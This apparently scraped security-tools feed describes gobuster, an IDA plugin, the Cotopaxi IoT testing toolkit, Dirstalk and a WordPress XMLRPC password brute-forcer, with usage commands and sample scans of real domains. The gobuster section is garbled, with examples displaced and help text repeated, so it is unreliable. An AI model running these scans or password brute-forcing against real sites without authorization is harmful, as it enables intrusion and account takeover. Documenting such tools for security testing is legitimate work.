  • dns - DNS subdomain brute-forcing mode
  • vhost - virtual host brute-forcing mode (not the same as DNS!)

Built-in Help
Help is built-in!
  • gobuster help - outputs the top-level help.
  • gobuster help <mode> - outputs the help specific to that mode.

dns Mode Help
Usage:    gobuster dns [flags]    Flags:    -d, --domain string      The target domain    -h, --help               help for dns    -r, --resolver string    Use custom DNS server (format server.com or server.com:port)    -c, --showcname          Show CNAME records (cannot be used with '-i' option)    -i, --showips            Show IP addresses        --timeout duration   DNS resolver timeout (default 1s)        --wildcard           Force continued operation when wildcard found    Global Flags:    -z, --noprogress        Don't display progress    -o, --output string     Output file to write results to (defaults to stdout)    -q, --quiet             Don't print the banner and other noise    -t, --threads int       Number of concurrent threads (default 10)        --delay duration    Time each thread waits between requests (e.g. 1500ms)    -v, --verbose           Verbose output (errors)    -w, --wordlist string   Path to the wordlist  

dir Mode Options
Usage:    gobuster dir [flags]    Flags:    -f, --addslash                      Append / to each request    -c, --cookies string                Cookies to use for the requests    -e, --expanded                      Expanded mode, print full URLs    -x, --extensions string             File extension(s) to search for    -r, --followredirect                Follow redirects    -H, --headers stringArray           Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'    -h, --help                          help for dir    -l, --includelength                 Include the length of the body in the output    -k, --insecuressl                   Skip SSL certificate verification    -n, --nostatus                      Don't print status codes    -P, --password string               Password for Basic Auth    -p, --proxy string                  Proxy to use for requests [http(s)://host:port]    -s, --statuscodes string            Positive status codes (will be overwritten with statuscodesblacklist if set) (default "200,204,301,302,307,401,403")    -b, --statuscodesblacklist string   Negative status codes (will override statuscodes if set)        --timeout duration              HTTP Timeout (default 10s)    -u, --url string                    The target URL    -a, --useragent string              Set the User-Agent string (default "gobuster/3.0.1")    -U, --username string               Username for Basic Auth        --wildcard                      Force continued operation when wildcard found    Global Flags:    -z, --noprogress        Don't display progress    -o, --output string     Output file to write results to (defaults to stdout)    -q, --quiet             Don't print the banner and other noise    -t, --threads int       Number of concurrent threads (default 10)        --delay duration    Time each thread waits between requests (e.g. 1500ms)    -v, --verbose           Verbose output (errors)    -w, --wordlist string   Path to the wordlist  

vhost Mode Options
Usage:    gobuster vhost [flags]    Flags:    -c, --cookies string        Cookies to use for the requests    -r, --followredirect        Follow redirects    -H, --headers stringArray   Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'    -h, --help                  help for vhost    -k, --insecuressl           Skip SSL certificate verification    -P, --password string       Password for Basic Auth    -p, --proxy string          Proxy to use for requests [http(s)://host:port]        --timeout duration      HTTP Timeout (default 10s)    -u, --url string            The target URL    -a, --useragent string      Set the User-Agent string (default "gobuster/3.0.1")    -U, --username string       Username for Basic Auth    Global Flags:    -z, --noprogress        Don't display progress    -o, --output string     Output file to write results to (defaults to stdout)    -q, --quiet             Don't print the banner and other noise    -t, --threads int       Number of concurrent threads (default 10)        --delay duration    Time each thread waits between requests (e.g. 1500ms)    -v, --verbose           Verbose output (errors)    -w, --wordlist string   Path to the wordlist  

Easy Installation

Binary Releases
We are now shipping binaries for each of the releases so that you don't even have to build them yourself! How wonderful is that!
If you're stupid enough to trust binaries that I've put together, you can download them from the releases page.

Using go get
If you have a Go environment ready to go, it's as easy as:
Usage:
gobuster dns [flags]

Flags:
-d, --domain string The target domain
-h, --help help for dns
-r, --resolver string Use custom DNS server (format server.com or server.com:port)
-c, --showcname Show CNAME records (cannot be used with '-i' option)
-i, --showips Show IP addresses
--timeout duration DNS resolver timeout (default 1s)
--wildcard Force continued operation when wildcard found

Global Flags:
-z, --noprogress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
--delay duration Time each thread waits between requests (e.g. 1500ms)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist

Building From Source
Since this tool is written in Go you need to install the Go language/compiler/etc. Full details of installation and set up can be found on the Go language website. Once installed you have two options.

Compiling
gobuster now has external dependencies, and so they need to be pulled in first:
Usage:
gobuster dir [flags]

Flags:
-f, --addslash Append / to each request
-c, --cookies string Cookies to use for the requests
-e, --expanded Expanded mode, print full URLs
-x, --extensions string File extension(s) to search for
-r, --followredirect Follow redirects
-H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-h, --help help for dir
-l, --includelength Include the length of the body in the output
-k, --insecuressl Skip SSL certificate verification
-n, --nostatus Don't print status codes
-P, --password string Password for Basic Auth
-p, --proxy string Proxy to use for requests [http(s)://host:port]
-s, --statuscodes string Positive status codes (will be overwritten with statuscodesblacklist if set) (default "200,204,301,302,307,401,403")
-b, --statuscodesblacklist string Negative status codes (will override statuscodes if set)
--timeout duration HTTP Timeout (default 10s)
-u, --url string The target URL
-a, --useragent string Set the User-Agent string (default "gobuster/3.0.1")
-U, --username string Username for Basic Auth
--wildcard Force continued operation when wildcard found

Global Flags:
-z, --noprogress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
--delay duration Time each thread waits between requests (e.g. 1500ms)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
This will create a gobuster binary for you. If you want to install it in the $GOPATH/bin folder you can run:
Usage:
gobuster vhost [flags]

Flags:
-c, --cookies string Cookies to use for the requests
-r, --followredirect Follow redirects
-H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-h, --help help for vhost
-k, --insecuressl Skip SSL certificate verification
-P, --password string Password for Basic Auth
-p, --proxy string Proxy to use for requests [http(s)://host:port]
--timeout duration HTTP Timeout (default 10s)
-u, --url string The target URL
-a, --useragent string Set the User-Agent string (default "gobuster/3.0.1")
-U, --username string Username for Basic Auth

Global Flags:
-z, --noprogress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the ba nner and other noise
-t, --threads int Number of concurrent threads (default 10)
--delay duration Time each thread waits between requests (e.g. 1500ms)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
If you have all the dependencies already, you can make use of the build scripts:
  • make - builds for the current Go configuration (ie. runs go build).
  • make windows - builds 32 and 64 bit binaries for windows, and writes them to the build subfolder.
  • make linux - builds 32 and 64 bit binaries for linux, and writes them to the build subfolder.
  • make darwin - builds 32 and 64 bit binaries for darwin, and writes them to the build subfolder.
  • make all - builds for all platforms and architectures, and writes the resulting binaries to the build subfolder.
  • make clean - clears out the build subfolder.
  • make test - runs the tests.

Wordlists via STDIN
Wordlists can be piped into gobuster via stdin by providing a - to the -w option:
go get github.com/OJ/gobuster
Note: If the -w option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate.

Examples

dir Mode
Command line might look like this:
go get && go build
Default options looks like this:
go install
Default options with status codes disabled looks like this:
hashcat -a 3 --stdout ?l | gobuster dir -u https://mysite.com -w -
Verbose output looks like this:
gobuster dir -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html
Example showing content length:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] Timeout : 10s
===============================================================
2019/06/21 11:49:43 Starting gobuster
===============================================================
/categories (Status: 301)
/contact (Status: 301)
/posts (Status: 301)
/index (Status: 200)
===============================================================
2019/06/21 11:49:44 Finished
========================= ======================================
Quiet output, with status disabled and expanded mode looks like this ("grep mode"):
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -n

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] No status : true
[+] Timeout : 10s
===============================================================
2019/06/21 11:50:18 Starting gobuster
===============================================================
/categories
/contact
/index
/posts
===============================================================
2019/06/21 11:50:18 Finished
================================================== =============

dns Mode
Command line might look like this:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -v

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] Verbose : true
[+] Timeout : 10s
===============================================================
2019/06/21 11:50:51 Starting gobuster
===============================================================
Missed: /alsodoesnotexist (Status: 404)
Found: /index (Status: 200)
Missed: /doesnotexist (Status: 404)
Found: /categories (Status: 301)
Found: /posts (Status: 301)
Found: /contact ( Status: 301)
===============================================================
2019/06/21 11:50:51 Finished
===============================================================
Normal sample run goes like this:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -l

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] Show length : true
[+] Timeout : 10s
===============================================================
2019/06/21 11:51:16 Starting gobuster
===============================================================
/categories (Status: 301) [Size: 178]
/posts (Status: 301) [Size: 178]
/contact (Status: 301) [Size: 178]
/index (Status: 200) [Size: 51759]
============================================= ==================
2019/06/21 11:51:17 Finished
===============================================================
Show IP sample run goes like this:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -q -n -e
https://buffered.io/index
https://buffered.io/contact
https://buffered.io/posts
https://buffered.io/categories
Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain.
gobuster dns -d mysite.com -t 50 -w common-names.txt
Wildcard DNS is also detected properly:
gobuster dns -d google.com -w ~/wordlists/subdomains.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:54:20 Starting gobuster
===============================================================
Found: chrome.google.com
Found: ns1.google.com
Found: admin.google.com
Found: www.google.com
Found: m.google.com
Found: support.google.com
Found: translate.google.com
Found: cse.google.com
Found: news.google.com
Found: music.google.com
Found: mail.google.com
Found: store.google.com
Found: mobile.google.com
Found: search.google.com
Found: wap.google.com
Found: directory.google.com
Found: local.google.com
Found: blog.google.com
===============================================================
2019/06/21 11:54:20 Finished
===============================================================
If the user wants to force processing of a domain that has wildcard entries, use --wildcard:
gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:54:54 Starting gobuster
===============================================================
Found: www.google.com [172.217.25.36, 2404:6800:4006:802::2004]
Found: admin.google.com [172.217.25.46, 2404:6800:4006:806::200e]
Found: store.google.com [172.217.167.78, 2404:6800:4006:802::200e]
Found: mobile.google.com [172.217.25.43, 2404:6800:4006:802::200b]
Found: ns1.google.com [216.239.32.10, 2001:4860:4802:32::a]
Found: m.google.com [172.217.25.43, 2404:6800:4006:802::200b]
Found: cse.google.com [172.217.25.46, 2404:6800:4006:80a::200e]
Found: chrome.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: search.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: local.google.com [172.217.25.46, 2404:6800:4006:80a::200e]
Found: news.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: blog.google.com [216.58.199.73, 2404:6800:4006:806::2009]
Found: support.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: wap.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: directory.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: translate.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: music.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: mail.google.com [172.217.25.37, 2404:6800:4006:802::2005]
===============================================================
2019/06/21 11:54:55 Finished
==== ===========================================================

vhost Mode
Command line might look like this:
gobuster dns -d yp.to -w ~/wordlists/subdomains.txt -i

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : yp.to
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:56:43 Starting gobuster
===============================================================
2019/06/21 11:56:53 [-] Unable to validate base domain: yp.to
Found: cr.yp.to [131.193.32.108, 131.193.32.109]
===============================================================
2019/06/21 11:56:53 Finished
===============================================================
Normal sample run goes like this:
gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : 0.0.1.xip.io
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 12:13:48 Starting gobuster
===============================================================
2019/06/21 12:13:48 [-] Wildcard DNS found. IP address(es): 1.0.0.0
2019/06/21 12:13:48 [!] To force processing of Wildcard DNS, specify the '--wildcard' switch.
===============================================================
2019/06/21 12:13:48 Finished
===============================================================


Auto Re - IDA PRO Auto-Renaming Plugin With Tagging Support

$
0
0
IDA PRO Auto-Renaming Plugin With Tagging Support

Features

1. Auto-renaming dummy-named functions, which have one API call or jump to the imported API

Before


After



2. Assigning TAGS to functions accordingly to called API-indicators inside
  • Sets tags as repeatable function comments and displays TAG tree in the separate view
Some screenshots of TAGS view:





How TAGs look in unexplored code:


You can easily rename function using its context menu or just pressing n hotkey:


Installation
Just copy auto_re.py to the IDA\plugins directory and it will be available through Edit -> Plugins -> Auto RE menu


Cotopaxi - Set Of Tools For Security Testing Of Internet Of Things Devices Using Specific Network IoT Protocols

$
0
0

Set of tools for security testing of Internet of Things devices using protocols like: CoAP, DTLS, HTCPCP, mDNS, MQTT, SSDP.

Installation:
Simply clone code from git: https://github.com/Samsung/cotopaxi

Requirements:
Currently Cotopaxi works only with Python 2.7.x, but future versions will work also with Python 3.
If you have previous installation of scapy without scapy-ssl_tls, please remove it or use venv.
Installation of main libraries:
  1. scapy-ssl_tls (this will install also scapy in 2.4.2)
    pip install git+https://github.com/tintinweb/scapy-ssl_tls@ec5714d560c63ea2e0cce713cec54edc2bfa0833
Common problems:
  • If you encounter error: error: [Errno 2] No such file or directory: 'LICENSE', try repeating command - surprisingly it works.
  • If you encounter error: NameError: name 'os' is not defined - add missing import os to scapy/layers/ssl_tls.py.
All other required packages can be installed using requirements.txt file:
    pip install -r cotopaxi/requirements.txt
Manual installation of other required packages:
    pip install dnslib IPy hexdump pyyaml psutil enum34 configparser

Disclaimer
Cotopaxi toolkit is intended to be used only for authorized security testing!
Some tools (especially vulnerability tester and protocol fuzzer) can cause some devices or servers to stop acting in the intended way -- for example leading to crash or hang of tested entities or flooding with network traffic another entities.
Make sure you have permission from the owners of tested devices or servers before running these tools!
Make sure you check with your local laws before running these tools!

Tools in this package:
  • service_ping
  • server_fingerprinter
  • resource_listing
  • server_fingerprinter
  • protocol_fuzzer (for fuzzing servers)
  • client_proto_fuzzer (for fuzzing clients)
  • vulnerability_tester (for testing servers)
  • client_vuln_tester (for testing clients)
  • amplifier_detector
Protocols supported by different tools:
ToolCoAPDTLSHTCPCPmDNSMQTTSSDP
service_pingyesyesyesyesyesyes
server_fingerprinteryesyes
resource_listingyesyesyes
protocol_fuzzeryesyesyesyesyesyes
client_proto_fuzzeryesyesyesyesyesyes
vulnerability_testeryesyesyesyesyesyes
client_vuln_testeryesyesyesyesyesyes
amplifier_detectoryesyesyesyes

cotopaxi.service_ping
Tool for checking availability of network service at given IP and port ranges
usage: sudo python -m cotopaxi.service_ping [-h] [-v] [--protocol {UDP,TCP,CoAP,MQTT,DTLS,ALL}]
[--src-port SRC_PORT]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debu g mode (more messages)
--protocol {UDP,TCP,CoAP,mDNS,SSDP,MQTT,DTLS,ALL,HTCPCP}, -P {UDP,TCP,CoAP,mDNS,SSDP,MQTT,DTLS,ALL,HTCPCP}
protocol to be tested (UDP includes CoAP, DTLS, mDNS,
and SSDP, TCP includes CoAP, HTCPCP, and MQTT, ALL
includes all supported protocols)
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)

cotopaxi.server_fingerprinter
Tool for software fingerprinting of network servers at given IP and port ranges
Currently supported servers:
  • CoAP:
    • aiocoap,
    • CoAPthon,
    • FreeCoAP,
    • libcoap,
    • MicroCoAP,
    • Mongoose
    • Wakaama (formerly liblwm2m)
  • DTLS:
    • GnuTLS,
    • Goldy,
    • LibreSSL,
    • MatrixSSL,
    • mbed TLS,
    • OpenSSL,
    • TinyDTLS
usage: sudo python -m cotopaxi.server_fingerprinter [-h] [--retries RETRIES] [--timeout TIMEOUT]
[--verbose]
[--protocol {CoAP,DTLS}]
[--src-port SRC_PORT]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {CoAP,DTLS}, -P {CoAP,DTLS}
protocol to be tested
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)

cotopaxi.resource_listing
Tool for checking availability of resource named url on server at given IP and port ranges. Sample URL lists are available in the urls directory
usage: sudo python -m cotopaxi.resource_listing [-h] [-v] [--protocol {CoAP,ALL}]
[--method {GET,POST,PUT,DELETE,ALL}]
[--src-port SRC_PORT]
dest_ip dest_port url_filepath

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both
url_filepath path to file with list of URLs to be tested (each URL
in separated line)

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {CoAP,mDNS,SSDP}, -P {CoAP,mDNS,SSDP}
protocol to be tested
--method {GET,POST,PUT,DELETE,ALL}, -M {GET,POST,PUT,DELETE,ALL}
methods to be tested (ALL includes all supported
methods)
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)

cotopaxi.protocol_fuzzer
Black-box fuzzer for testing protocol servers
usage: sudo python -m cotopaxi.protocol_fuzzer 
[-h] [--retries RETRIES] [--timeout TIMEOUT]
[--verbose] [--protocol {CoAP,mDNS,MQTT,DTLS}]
[--src-ip SRC_IP] [--src-port SRC_PORT]
[--ignore-ping-check] [--corpus-dir CORPUS_DIR]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}, -P {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}
protocol to be tested
--hide-disclaimer, -HD
hides legal disclaimer (shown before starting
intrusive tools)
--src-ip SRC_IP, -SI SRC_IP
source IP address (return result will not be
received!)
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)
--corpus-dir CORPUS_DIR, -C CORPUS_DIR
path t o directory with fuzzing payloads (corpus) (each
payload in separated file)
--delay-after-crash DELAY_AFTER_CRASH, -DAC DELAY_AFTER_CRASH
number of seconds that fuzzer will wait after crash
for respawning tested server

cotopaxi.client_proto_fuzzer
Black-box fuzzer for testing protocol clients
usage: sudo client_proto_fuzzer.py [-h] [--server-ip SERVER_IP]
[--server-port SERVER_PORT]
[--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}]
[--verbose] [--corpus-dir CORPUS_DIR]

optional arguments:
-h, --help show this help message and exit
--server-ip SERVER_IP, -SI SERVER_IP
IP address, that will be used to set up tester server
--server-port SERVER_PORT, -SP SERVER_PORT
port that will be used to set up server
--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}, -P {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}
protocol to be tested
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--corpus-dir CORPUS_DIR, -C CORPUS_DIR
path to directory with fuzzing payloads (corpus) (each
payload in separated file)

cotopaxi.vulnerability_tester
Tool for checking vulnerability of network service at given IP and port ranges
usage: sudo python -m cotopaxi.vulnerability_tester [-h] [-v]
[--cve {ALL,CVE-2018-19417,...}]
[--list LIST] [--src-port SRC_PORT]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--protocol {UDP,TCP,CoAP,mDNS,MQTT,DTLS,ALL}, -P {UDP,TCP,CoAP,mDNS,MQTT,DTLS,ALL}
protocol to be tested (UDP includes CoAP, mDNS and
DTLS, TCP includes CoAP and MQTT, ALL includes all
supported protocols)
--hide-disclaimer, -HD
hides legal disclaimer (shown before starting
intrusive tools)
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--cve {ALL,CVE-2018-19417,...}
list of vulnerabilities to be tested (by CVE id)
--vuln {ALL,BOTAN_000,COAPTHON3_000,...}
list of vulnerabilities to be tested (by SOFT_NUM id)

--list, -L display lists of all vulnerabilities supported by this
tool with detailed description
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)

cotopaxi.client_vuln_tester
Tool for checking vulnerability of network clients connecting to server provided by this tool
usage: sudo client_vuln_tester.py [-h] [--server-ip SERVER_IP]
[--server-port SERVER_PORT]
[--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}]
[--verbose]
[--vuln {ALL,BOTAN_000,COAPTHON3_000,...} [{ALL,BOTAN_000,COAPTHON3_000,...} ...]]
[--cve {ALL,CVE-2017-12087,...} [{ALL,CVE-2017-12087,...} ...]]
[--list]

optional arguments:
-h, --help show this help message and exit
--server-ip SERVER_IP, -SI SERVER_IP
IP address, that will be used to set up tester server
--server-port SERVER_PORT, -SP SERVER_PORT
port that will be used to set up server
--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}, -P {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}
protocol to be tested
--verbo se, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--vuln {ALL,BOTAN_000,COAPTHON3_000,...} [{ALL,BOTAN_000,COAPTHON3_000,...} ...]
list of vulnerabilities to be tested (by SOFT_NUM id)
--cve {ALL,CVE-2017-12087,CVE-2017-12130,...} [{ALL,CVE-2017-12087,CVE-2017-12130,...} ...]
list of vulnerabilities to be tested (by CVE id)
--list, -L display lists of all vulnerabilities supported by this
tool with detailed description

cotopaxi.amplifier_detector
Tool for detection of network devices amplifying reflected traffic by observing size of incoming and outgoing size of packets
usage: sudo python -m cotopaxi.amplifier_detector [-h] [--port PORT] [--nr NR] [--verbose] dest_ip

positional arguments:
dest_ip destination IP address

optional arguments:
-h, --help show this help message and exit
--interval INTERVAL, -I INTERVAL
minimal interval in sec between displayed status
messages (default: 1 sec)
--port PORT, --dest_port PORT, -P PORT
destination port
--nr NR, -N NR number of packets to be sniffed (default: 9999999)
--verbose, -V, --debug, -D
turn on verbose/debug mode (more messages)

Known issues / limitations
There are some known issues or limitations caused by using scapy as network library:
  • testing services running on the same machine can results in issues occurred by not delivering some packets,
  • multiple tools running against the same target can result in interference between them (packets may be indicated as a response to another request).
See more at: https://scapy.readthedocs.io/en/latest/troubleshooting.html#

Unit tests
To run all unit tests use (from directory upper than cotopaxi dir):
    sudo python -m unittest discover
Most of tests are performed against remote tests servers and require preparing test environment, providing settings in tests/test_config.ini and tests/test_servers.yaml.


Dirstalk - Modern Alternative To Dirbuster/Dirb

$
0
0

Dirstalk is a multi threaded application designed to brute force paths on web servers.
The tool contains functionalities similar to the ones offered by dirbuster and dirb.

Here you can see it in action:


How to use it
The application is self-documenting, launching dirstalk -h will return all the available commands with a short description, you can get the help for each command by doing distalk <command> -h.
EG dirstalk result.diff -h

Scan
To perform a scan you need to provide at least a dictionary and a URL:
dirstalk scan http://someaddress.url/ --dictionary mydictionary.txt
As mentioned before, to see all the flags available for the scan command you can just call the command with the -h flag:
dirstalk scan -h

Example of how you can customize a scan:
dirstalk scan http://someaddress.url/ \
--dictionary mydictionary.txt \
--http-methods GET,POST \
--http-timeout 10000 \
--scan-depth 10 \
--threads 10 \
--socks5 127.0.0.1:9150 \
--cookie name=value \
--use-cookie-jar \
--user-agent my_user_agent \
--header "Authorization: Bearer 123"

Currently available flags:
      --cookie stringArray             cookie to add to each request; eg name=value (can be specified multiple times)
-d, --dictionary string dictionary to use for the scan (path to local file or remote url)
--header stringArray header to add to each request; eg name=value (can be specified multiple times)
-h, --help help for scan
--http-cache-requests cache requests to avoid performing the same request multiple times within the same scan (EG if the server reply with the same redirect location multiple times, dirstalk will follow it only once) (default true)
--http-methods strings comma separated list of http methods to use; eg: GET,POST,PUT (default [GET])
--http-statu ses-to-ignore ints comma separated list of http statuses to ignore when showing and processing results; eg: 404,301 (default [404])
--http-timeout int timeout in milliseconds (default 5000)
--out string path where to store result output
--scan-depth int scan depth (default 3)
--socks5 string socks5 host to use
-t, --threads int amount of threads for concurrent requests (default 3)
--use-cookie-jar enables the use of a cookie jar: it will retain any cookie sent from the server and send them for the following requests
--user-agent string user agent to use for http requests

Useful resources
  • here you can find dictionaries that can be used with dirstalk
  • tordock is a containerized Tor SOCKS5 that you can use easily with dirstalk (just docker run -d -p 127.0.0.1:9150:9150 stefanoj3/tordock:latest and then when launching a scan specify the following flag: --socks5 127.0.0.1:9150)

Dictionary generator
Dirstalk can also produce it's own dictionaries, useful for example if you want to check if a specific set of files is available on a given web server.

Example:
dirstalk dictionary.generate /path/to/local/files --out mydictionary.txt
The result will be printed to the stdout if no out flag is specified.

Download
You can download a release from here or you can use a docker image. (eg docker run stefanoj3/dirstalk dirstalk <cmd>)
If you are using an arch based linux distribution you can fetch it via AUR: https://aur.archlinux.org/packages/dirstalk/
Example:
yay -S aur/dirstalk

Development
All you need to do local development is to have make and golang available and the GOPATH correctly configured.
Then you can just:
go get github.com/stefanoj3/dirstalk         # (or your fork) to obtain the source code
cd $GOPATH/src/github.com/stefanoj3/dirstalk # to go inside the project folder
make dep # to fetch all the required tools and dependencies
make tests # to run the test suite
make check # to check for any code style issue
make fix # to automatically fix the code style using goimports
make build # to build an executable for your host OS (not tested under windows)
dep is the tool of choice for dependency management.
make help
will print a description of every command available in the Makefile.
Wanna add a functionality? fix a bug? fork and create a PR.

Plans for the future
  • Add support for rotating SOCKS5 proxies
  • Scan a website pages looking for links to bruteforce
  • Expose a webserver that can be used to launch scans and check their status
  • Introduce metrics that can give a sense of how much of the dictionary was found on the remote server


XMLRPC Bruteforcer - An XMLRPC Brute Forcer Targeting Wordpress

$
0
0

An XMLRPC brute forcer targeting Wordpress written in Python 3. In the context of xmlrpc brute forcing, its faster than Hydra and WpScan. It can brute force 1000 passwords per second.

Usage
python3 xmlrcpbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt

Bugs
If you get an xml.etree.ElementTree.ParseError:
  • Did you forget to add 'xmlrpc' in the url ?
  • Try to add or remove 'https' or 'www'.
